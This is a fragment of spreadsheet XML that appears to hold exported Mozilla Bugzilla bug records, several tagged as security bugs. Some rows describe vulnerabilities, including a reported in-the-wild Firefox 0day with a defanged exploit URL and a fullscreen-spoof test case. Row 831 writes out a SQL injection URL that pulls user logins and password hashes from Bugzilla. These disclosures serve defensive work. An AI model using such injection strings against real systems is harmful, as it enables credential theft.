&gt;Stats: 240M malloced (451M for red zones) by 317154 calls
&gt;Stats: 46M realloced by 16904 calls
&gt;Stats: 216M freed by 213235 calls
&gt;Stats: 101M really freed by 144972 calls
&gt;Stats: 556M (556M-0M) mmaped; 139 maps, 0 unmaps
&gt;  mmaps   by size class: 10:208845; 11:12282; 12:2048; 13:1536; 14:1280; 15:384; 16:960; 17:1280; 18:48; 19:40; 20:24;
&gt;  mallocs by size class: 10:289278; 11:19039; 12:2422; 13:1691; 14:1481; 15:401; 16:1349; 17:1358; 18:73; 19:40; 20:22;
&gt;  frees   by size class: 10:189445; 11:16471; 12:1491; 13:1492; 14:1332; 15:287; 16:1259; 17:1342; 18:59; 19:38; 20:19;
&gt;  rfrees  by size class: 10:131090; 11:10181; 12:729; 13:671; 14:710; 15:182; 16:820; 17:558; 18:26; 19:4; 20:1;
&gt;Stats: malloc large: 1493 small slow: 3726
&gt;Stats: StackDepot: 0 ids; 0M mapped
&gt;==10500== ABORTING
&gt;</t>
        </is>
      </c>
      <c r="X819" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="820">
      <c r="A820" t="n">
        <v>486783</v>
      </c>
      <c r="B820" t="inlineStr">
        <is>
          <t>2009-04-03 16:21:10 -0700</t>
        </is>
      </c>
      <c r="C820" t="inlineStr">
        <is>
          <t>Run unit tests on pre-existing nightly builds</t>
        </is>
      </c>
      <c r="D820" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E820" t="n">
        <v>1</v>
      </c>
      <c r="F820" t="n">
        <v>1</v>
      </c>
      <c r="G820" t="n">
        <v>5</v>
      </c>
      <c r="H820" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I820" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J820" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K820" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L820" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M820" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N820" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O820" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P820" t="inlineStr"/>
      <c r="Q820" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R820" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S820" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T820" t="n">
        <v>1</v>
      </c>
      <c r="U820" t="n">
        <v>0</v>
      </c>
      <c r="V820" t="n">
        <v>21</v>
      </c>
      <c r="W820" t="inlineStr">
        <is>
          <t>Once we are able to run unittests on incremental builds, we should have the automation run unittests on nightly and release builds also. 
Its separate work, and blocked, so filing separate bug in Future to track this.</t>
        </is>
      </c>
      <c r="X820" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="821">
      <c r="A821" t="n">
        <v>21427</v>
      </c>
      <c r="B821" t="inlineStr">
        <is>
          <t>1999-12-10 14:30:56 -0800</t>
        </is>
      </c>
      <c r="C821" t="inlineStr">
        <is>
          <t>UI: "Query Page" doesn't show up in index.html</t>
        </is>
      </c>
      <c r="D821" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:20 -0800</t>
        </is>
      </c>
      <c r="E821" t="n">
        <v>1</v>
      </c>
      <c r="F821" t="n">
        <v>1</v>
      </c>
      <c r="G821" t="n">
        <v>4</v>
      </c>
      <c r="H821" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I821" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J821" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K821" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L821" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M821" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N821" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O821" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P821" t="inlineStr"/>
      <c r="Q821" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R821" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S821" t="inlineStr">
        <is>
          <t>Bugzilla old</t>
        </is>
      </c>
      <c r="T821" t="n">
        <v>1</v>
      </c>
      <c r="U821" t="n">
        <v>0</v>
      </c>
      <c r="V821" t="n">
        <v>12</v>
      </c>
      <c r="W821" t="inlineStr">
        <is>
          <t>Most of bugzilla refers to the query page as
"Query Page", but index.html (top level bugzilla)
now has "Search existing bug reports".
This is confusing for me, I'm hunting for "Query"
out of long-time habit and/or consistancy's sake.
Suggest "Query Page (Search for existing bug reports)"?</t>
        </is>
      </c>
      <c r="X821" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="822">
      <c r="A822" t="n">
        <v>259708</v>
      </c>
      <c r="B822" t="inlineStr">
        <is>
          <t>2004-09-15 19:40:05 -0700</t>
        </is>
      </c>
      <c r="C822" t="inlineStr">
        <is>
          <t>Trying to save file from data: protocol wipes every file in target directory not marked read-only</t>
        </is>
      </c>
      <c r="D822" t="inlineStr">
        <is>
          <t>2008-07-31 01:47:29 -0700</t>
        </is>
      </c>
      <c r="E822" t="n">
        <v>1</v>
      </c>
      <c r="F822" t="n">
        <v>1</v>
      </c>
      <c r="G822" t="n">
        <v>3</v>
      </c>
      <c r="H822" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I822" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J822" t="inlineStr">
        <is>
          <t>Downloads API</t>
        </is>
      </c>
      <c r="K822" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L822" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M822" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N822" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O822" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P822" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q822" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R822" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S822" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T822" t="n">
        <v>1</v>
      </c>
      <c r="U822" t="n">
        <v>1</v>
      </c>
      <c r="V822" t="n">
        <v>39</v>
      </c>
      <c r="W822" t="inlineStr">
        <is>
          <t>Testcase coming up in a few minutes.
Mozilla/5.0 (Windows; U; Win98; rv:1.7.3) Gecko/20040913 Firefox/0.10
Basically, I had written an article for my blog (not yet posted) whereby a short
script would convert a textarea's contents into a data: URI for saving.
So with a content-type of application/octet-stream, Firefox would try to save
it.  Unfortunately, it would never go beyond the "Starting" phase of the "download".
When you hit cancel, bye-bye directory's contents, except for the first file.
Repeated testcase in Mozilla 1.8a3:  did NOT see the same results.  Example
worked perfectly.</t>
        </is>
      </c>
      <c r="X822" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="823">
      <c r="A823" t="n">
        <v>607222</v>
      </c>
      <c r="B823" t="inlineStr">
        <is>
          <t>2010-10-25 21:28:45 -0700</t>
        </is>
      </c>
      <c r="C823" t="inlineStr">
        <is>
          <t>Interleaving document.write and appendChild can lead to duplicate text frames and overrunning of text run buffers</t>
        </is>
      </c>
      <c r="D823" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E823" t="n">
        <v>1</v>
      </c>
      <c r="F823" t="n">
        <v>1</v>
      </c>
      <c r="G823" t="n">
        <v>3</v>
      </c>
      <c r="H823" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I823" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J823" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K823" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L823" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M823" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N823" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O823" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P823" t="inlineStr">
        <is>
          <t>[sg:critical] 0day</t>
        </is>
      </c>
      <c r="Q823" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R823" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S823" t="inlineStr">
        <is>
          <t>mozilla2.0b7</t>
        </is>
      </c>
      <c r="T823" t="n">
        <v>1</v>
      </c>
      <c r="U823" t="n">
        <v>0</v>
      </c>
      <c r="V823" t="n">
        <v>81</v>
      </c>
      <c r="W823" t="inlineStr">
        <is>
          <t>Created attachment 485975
PoC (without the binary)
Morten Kråkvik of Telenor SOC reported an in-the-wild 0day affecting Firefox 3.6.x on Windows to security@:
=========================================================================
A compromised site is currently redirecting visitors to
hxxp://l-3com.dyndns-work.com/admissions/admin.php, which contains
exploits directed at Firefox users on Windows.
The exploit is confirmed successful on Windows XP SP3 + Firefox
3.6.11.</t>
        </is>
      </c>
      <c r="X823" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="824">
      <c r="A824" t="n">
        <v>691873</v>
      </c>
      <c r="B824" t="inlineStr">
        <is>
          <t>2011-10-04 12:08:31 -0700</t>
        </is>
      </c>
      <c r="C824" t="inlineStr">
        <is>
          <t>js::types::TypeCompartment::addPending can write off end of pendingArray if OOM</t>
        </is>
      </c>
      <c r="D824" t="inlineStr">
        <is>
          <t>2012-02-16 14:17:43 -0800</t>
        </is>
      </c>
      <c r="E824" t="n">
        <v>1</v>
      </c>
      <c r="F824" t="n">
        <v>1</v>
      </c>
      <c r="G824" t="n">
        <v>3</v>
      </c>
      <c r="H824" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I824" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J824" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K824" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L824" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M824" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N824" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O824" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P824" t="inlineStr">
        <is>
          <t>[sg:critical?][qa?]</t>
        </is>
      </c>
      <c r="Q824" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R824" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S824" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T824" t="n">
        <v>1</v>
      </c>
      <c r="U824" t="n">
        <v>0</v>
      </c>
      <c r="V824" t="n">
        <v>8</v>
      </c>
      <c r="W824" t="inlineStr">
        <is>
          <t>In TypeCompartment::addPending, we say:
    if (pendingCount == pendingCapacity)
        growPendingArray(cx);
    PendingWork &amp;pending = pendingArray[pendingCount++];
    pending.constraint = constraint;
    pending.source = source;
    pending.type = type;
If growPendingArray fails because of OOM, then the writes to pending's referent's members are writing off the end of the array.
It looks as if, once pendingCount &gt; pendingCapacity, we won't try to call growPendingArray any more, and all subsequent addPending calls will write off the end of that array, so we might be able to reach pretty far.</t>
        </is>
      </c>
      <c r="X824" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="825">
      <c r="A825" t="n">
        <v>839153</v>
      </c>
      <c r="B825" t="inlineStr">
        <is>
          <t>2013-02-07 10:43:13 -0800</t>
        </is>
      </c>
      <c r="C825" t="inlineStr">
        <is>
          <t>Work - Design metro/immersive UI for "import data from other browsers"</t>
        </is>
      </c>
      <c r="D825" t="inlineStr">
        <is>
          <t>2014-07-24 11:06:19 -0700</t>
        </is>
      </c>
      <c r="E825" t="n">
        <v>1</v>
      </c>
      <c r="F825" t="n">
        <v>1</v>
      </c>
      <c r="G825" t="n">
        <v>6</v>
      </c>
      <c r="H825" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I825" t="inlineStr">
        <is>
          <t>Firefox for Metro Graveyard</t>
        </is>
      </c>
      <c r="J825" t="inlineStr">
        <is>
          <t>Browser</t>
        </is>
      </c>
      <c r="K825" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L825" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M825" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N825" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O825" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P825" t="inlineStr">
        <is>
          <t>feature=work</t>
        </is>
      </c>
      <c r="Q825" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R825" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S825" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T825" t="n">
        <v>1</v>
      </c>
      <c r="U825" t="n">
        <v>0</v>
      </c>
      <c r="V825" t="n">
        <v>13</v>
      </c>
      <c r="W825" t="inlineStr">
        <is>
          <t>See user story in bug 831610.
A user of Firefox metro/immersive should be able to import data from other browsers.  This bug is about designing a UI for that experience.</t>
        </is>
      </c>
      <c r="X825" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="826">
      <c r="A826" t="n">
        <v>60818</v>
      </c>
      <c r="B826" t="inlineStr">
        <is>
          <t>2000-11-20 19:01:57 -0800</t>
        </is>
      </c>
      <c r="C826" t="inlineStr">
        <is>
          <t>Bugzilla rejects attachment type 'text/plain;charset=utf-8'</t>
        </is>
      </c>
      <c r="D826" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:23 -0800</t>
        </is>
      </c>
      <c r="E826" t="n">
        <v>1</v>
      </c>
      <c r="F826" t="n">
        <v>1</v>
      </c>
      <c r="G826" t="n">
        <v>4</v>
      </c>
      <c r="H826" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I826" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J826" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K826" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L826" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M826" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N826" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O826" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P826" t="inlineStr"/>
      <c r="Q826" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R826" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S826" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T826" t="n">
        <v>1</v>
      </c>
      <c r="U826" t="n">
        <v>1</v>
      </c>
      <c r="V826" t="n">
        <v>15</v>
      </c>
      <c r="W826" t="inlineStr">
        <is>
          <t>I just tried to upload an attachment with MIME type
    text/plain;charset=utf-8
and Bugzilla rejected it with a remark similar to:
    You need to provide a valid MIME type. 'text/plain;charset=utf-8' simply
    will not do it.</t>
        </is>
      </c>
      <c r="X826" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="827">
      <c r="A827" t="n">
        <v>1391146</v>
      </c>
      <c r="B827" t="inlineStr">
        <is>
          <t>2017-08-16 21:06:46 -0700</t>
        </is>
      </c>
      <c r="C827" t="inlineStr">
        <is>
          <t>Refresh icon disappears in Customize after visiting two websites and opening Customize on each</t>
        </is>
      </c>
      <c r="D827" t="inlineStr">
        <is>
          <t>2018-05-13 03:28:09 -0700</t>
        </is>
      </c>
      <c r="E827" t="n">
        <v>1</v>
      </c>
      <c r="F827" t="n">
        <v>1</v>
      </c>
      <c r="G827" t="n">
        <v>2</v>
      </c>
      <c r="H827" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I827" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J827" t="inlineStr">
        <is>
          <t>Toolbars and Customization</t>
        </is>
      </c>
      <c r="K827" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L827" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M827" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N827" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O827" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P827" t="inlineStr">
        <is>
          <t>[reserve-photon-animation]</t>
        </is>
      </c>
      <c r="Q827" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R827" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S827" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T827" t="n">
        <v>1</v>
      </c>
      <c r="U827" t="n">
        <v>0</v>
      </c>
      <c r="V827" t="n">
        <v>15</v>
      </c>
      <c r="W827" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Build ID: 20170816100153
Steps to reproduce:
1. Open website #1 in a tab (e.g. youtube.com).
2. Go to the hamburger menu and press Customize.
3. Close out of Customize.
4. Open a new tab and go to website #2 (e.g. reddit.com).
5. Go to the hamburger menu and press Customize.
Tested in a fresh, new profile without any addons.
Actual results:
The Refresh icon in Customize is invisible. You can still actually grab it and move it around, and when you exit out of Customize it's fine, but the image is just no longer there in Customize mode until you restart Nightly.
Expected results:
The Refresh icon shouldn't be invisible in Customize.</t>
        </is>
      </c>
      <c r="X827" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="828">
      <c r="A828" t="n">
        <v>650275</v>
      </c>
      <c r="B828" t="inlineStr">
        <is>
          <t>2011-04-15 07:14:45 -0700</t>
        </is>
      </c>
      <c r="C828" t="inlineStr">
        <is>
          <t>"ABORT: bad scope for new JSObjects" with setTimeout</t>
        </is>
      </c>
      <c r="D828" t="inlineStr">
        <is>
          <t>2013-12-27 14:30:36 -0800</t>
        </is>
      </c>
      <c r="E828" t="n">
        <v>1</v>
      </c>
      <c r="F828" t="n">
        <v>1</v>
      </c>
      <c r="G828" t="n">
        <v>3</v>
      </c>
      <c r="H828" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I828" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J828" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K828" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L828" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M828" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N828" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O828" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P828" t="inlineStr">
        <is>
          <t>[sg:critical?] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q828" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R828" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S828" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T828" t="n">
        <v>1</v>
      </c>
      <c r="U828" t="n">
        <v>0</v>
      </c>
      <c r="V828" t="n">
        <v>10</v>
      </c>
      <c r="W828" t="inlineStr">
        <is>
          <t>Created attachment 526246
testcase (crashes Firefox when loaded)
###!!! ABORT: bad scope for new JSObjects: 'type.IsArithmetic() || cx-&gt;compartment == lccx.GetScopeForNewJSObjects()-&gt;compartment()', file js/src/xpconnect/src/xpcconvert.cpp, line 253</t>
        </is>
      </c>
      <c r="X828" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="829">
      <c r="A829" t="n">
        <v>330971</v>
      </c>
      <c r="B829" t="inlineStr">
        <is>
          <t>2006-03-18 16:29:16 -0800</t>
        </is>
      </c>
      <c r="C829" t="inlineStr">
        <is>
          <t>Invoke cvsmailfilter.pl with new -c option for crypto checkins</t>
        </is>
      </c>
      <c r="D829" t="inlineStr">
        <is>
          <t>2006-09-13 23:42:42 -0700</t>
        </is>
      </c>
      <c r="E829" t="n">
        <v>1</v>
      </c>
      <c r="F829" t="n">
        <v>1</v>
      </c>
      <c r="G829" t="n">
        <v>5</v>
      </c>
      <c r="H829" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I829" t="inlineStr">
        <is>
          <t>mozilla.org</t>
        </is>
      </c>
      <c r="J829" t="inlineStr">
        <is>
          <t>CVS: Administration</t>
        </is>
      </c>
      <c r="K829" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L829" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M829" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N829" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O829" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P829" t="inlineStr"/>
      <c r="Q829" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R829" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S829" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T829" t="n">
        <v>1</v>
      </c>
      <c r="U829" t="n">
        <v>0</v>
      </c>
      <c r="V829" t="n">
        <v>5</v>
      </c>
      <c r="W829" t="inlineStr">
        <is>
          <t>When checkins are made to NSS, some CVS related code somewhere invokes
the cvsmailfilter.pl script to create a an email announcing the checkin.
JustDave added a new -c option to cvsmailfilter.pl.  
It causes the generated email to name the committer.
I'd like to see that feature used for the crypto checkins list.
If I knew what file needs to be changed and how to get a copy of it,
I'd submit a patch.</t>
        </is>
      </c>
      <c r="X829" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="830">
      <c r="A830" t="n">
        <v>1790815</v>
      </c>
      <c r="B830" t="inlineStr">
        <is>
          <t>2022-09-14 08:22:15 -0700</t>
        </is>
      </c>
      <c r="C830" t="inlineStr">
        <is>
          <t>Window.print allow focus stealing can be abused to overlap fullscreen security notification</t>
        </is>
      </c>
      <c r="D830" t="inlineStr">
        <is>
          <t>2024-05-30 11:00:29 -0700</t>
        </is>
      </c>
      <c r="E830" t="n">
        <v>1</v>
      </c>
      <c r="F830" t="n">
        <v>1</v>
      </c>
      <c r="G830" t="n">
        <v>3</v>
      </c>
      <c r="H830" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I830" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J830" t="inlineStr">
        <is>
          <t>Printing</t>
        </is>
      </c>
      <c r="K830" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L830" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M830" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N830" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O830" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P830" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main107+][adv-esr102.5+]</t>
        </is>
      </c>
      <c r="Q830" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R830" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S830" t="inlineStr">
        <is>
          <t>108 Branch</t>
        </is>
      </c>
      <c r="T830" t="n">
        <v>1</v>
      </c>
      <c r="U830" t="n">
        <v>0</v>
      </c>
      <c r="V830" t="n">
        <v>22</v>
      </c>
      <c r="W830" t="inlineStr">
        <is>
          <t>Created attachment 9294630
testcase.html
After create new child window with `window.open` then invoke `requestFullScreen` repeatedly on parent window and `window.print()` on child window simultaneously, the parent window will turn into full screen, then interestingly child window will be focused and overlapping the fullscreen notification.
## Tested on:
- Firefox Nightly 106.0a1 (2022-09-14) (64-bit) on Windows 11
- Firefox Nightly 106.0a1 (2022-09-14) (64-bit) on Arch Linux
- Firefox 104.0.2 (64-bit) on Windows 11
- Firefox ESR 91.13.0esr (64-bit) on Windows 11
## Steps to reproduce:
1. Visit attached testcase.html
2. Click "New Window" button
3. Click "Spoof" button on parent window
4. Fullscreen notification will be overlapped with child window
(There is a race possibility that caused window.print on child window to appear late, if that happens please try again)</t>
        </is>
      </c>
      <c r="X830" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="831">
      <c r="A831" t="n">
        <v>219044</v>
      </c>
      <c r="B831" t="inlineStr">
        <is>
          <t>2003-09-12 08:11:24 -0700</t>
        </is>
      </c>
      <c r="C831" t="inlineStr">
        <is>
          <t>MySQL injection vulnerability in editkeywords.cgi</t>
        </is>
      </c>
      <c r="D831" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:37 -0800</t>
        </is>
      </c>
      <c r="E831" t="n">
        <v>1</v>
      </c>
      <c r="F831" t="n">
        <v>1</v>
      </c>
      <c r="G831" t="n">
        <v>4</v>
      </c>
      <c r="H831" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I831" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J831" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K831" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L831" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M831" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N831" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O831" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P831" t="inlineStr">
        <is>
          <t>[fixed in 2.16.4] [fixed in 2.17.5]</t>
        </is>
      </c>
      <c r="Q831" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R831" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S831" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T831" t="n">
        <v>1</v>
      </c>
      <c r="U831" t="n">
        <v>0</v>
      </c>
      <c r="V831" t="n">
        <v>10</v>
      </c>
      <c r="W831" t="inlineStr">
        <is>
          <t>Any user with the editkeywords priv can do MySQL injection attacks and find out
confidential information using direct access to the Bugzilla database.
For example, by clicking the URL of this bug,
http://bugzilla.mozilla.org/editkeywords.cgi?action=edit&amp;id=1234567+union+select+login_name,cryptpassword+from+profiles
someone can find out the username and the cryptpassword of a user.
The issue is that the "ID" field is not validated before it's passed to the
SendSQL subroutine.</t>
        </is>
      </c>
      <c r="X831" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="832">
      <c r="A832" t="n">
        <v>438324</v>
      </c>
      <c r="B832" t="inlineStr">
        <is>
          <t>2008-06-10 05:55:34 -0700</t>
        </is>
      </c>
      <c r="C832" t="inlineStr">
        <is>
          <t>unit test boxes should show an error in the tinderbox log if a step times out</t>
        </is>
      </c>
      <c r="D832" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E832" t="n">
        <v>1</v>
      </c>
      <c r="F832" t="n">
        <v>1</v>
      </c>
      <c r="G832" t="n">
        <v>5</v>
      </c>
      <c r="H832" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I832" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J832" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K832" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L832" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M832" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N832" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O832" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P832" t="inlineStr"/>
      <c r="Q832" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R832" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
